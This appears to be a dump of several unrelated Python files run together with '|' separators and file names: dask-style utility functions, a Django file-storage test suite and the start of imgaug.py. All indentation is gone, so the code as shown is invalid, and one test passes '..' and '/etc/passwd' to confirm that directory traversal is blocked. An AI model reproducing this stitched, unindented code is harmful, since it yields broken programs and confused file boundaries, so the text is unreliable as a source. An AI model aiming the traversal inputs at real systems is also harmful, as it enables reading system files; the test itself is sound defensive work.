def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
if sys.version_info >= (3, 6):
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
else:
names = (mod_info[1] for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
if tornado.version_info[0] >= 5:
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
import tornado.platform.asyncio
asyncio.set_event_loop_policy(
tornado.platform.asyncio.AnyThreadEventLoopPolicy()
)
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
""" Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def is_coroutine_function(f):
return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f)
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None):
""" Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d: dict
The keywords to convert
cls: callable
The callable that consumes these terms to check them for validity
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls:
for k in d:
if not has_keyword(cls, k):
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
try:
_offload_executor = ThreadPoolExecutor(
max_workers=1, thread_name_prefix="Dask-Offload"
)
except TypeError:
_offload_executor = ThreadPoolExecutor(max_workers=1)
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
""" Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
def serialize_for_cli(data):
""" Serialize data into a string that can be passthrough cli
Parameters
----------
data: json-serializable object
The data to serialize
Returns
-------
serialized_data: str
The serialized data as a string
"""
return base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
def deserialize_for_cli(data):
""" De-serialize data into the original object
Parameters
----------
data: str
String serialied by serialize_for_cli()
Returns
-------
deserialized_data: obj
The de-serialized data
"""
return json.loads(base64.urlsafe_b64decode(data.encode()).decode())
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
""" Limited size mapping, evicting the least recently looked-up key when full
"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
|
tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import unittest
from datetime import datetime, timedelta
try:
import threading
except ImportError:
import dummy_threading as threading
from django.core.cache import cache
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import File, ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test import override_settings
from django.utils import six
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Storage, temp_storage, temp_storage_location
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaises(ImportError, get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError,
"No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_emtpy_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should stanslate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set(['storage_dir_1']))
self.assertEqual(set(files),
set(['storage_test_1', 'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class FileFieldStorageTests(unittest.TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertFalse("assignment.txt" in files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_1.txt")
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_2.txt")
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_file_numbering(self):
# Multiple files with the same name get _N appended to them.
objs = [Storage() for i in range(3)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
self.assertEqual(
[o.normal.name for o in objs],
["tests/multiple_files.txt", "tests/multiple_files_1.txt", "tests/multiple_files_2.txt"]
)
for o in objs:
o.delete()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
self.assertTrue(self.storage.exists('conflict'))
self.assertTrue(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
both if it was initialized with string or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("espaรฑol"))
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
urls = 'file_storage.urls'
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc
import six
import six.moves as sm
"""
try:
xrange
except NameError: # python3
xrange = range
"""
ALL = "ALL"
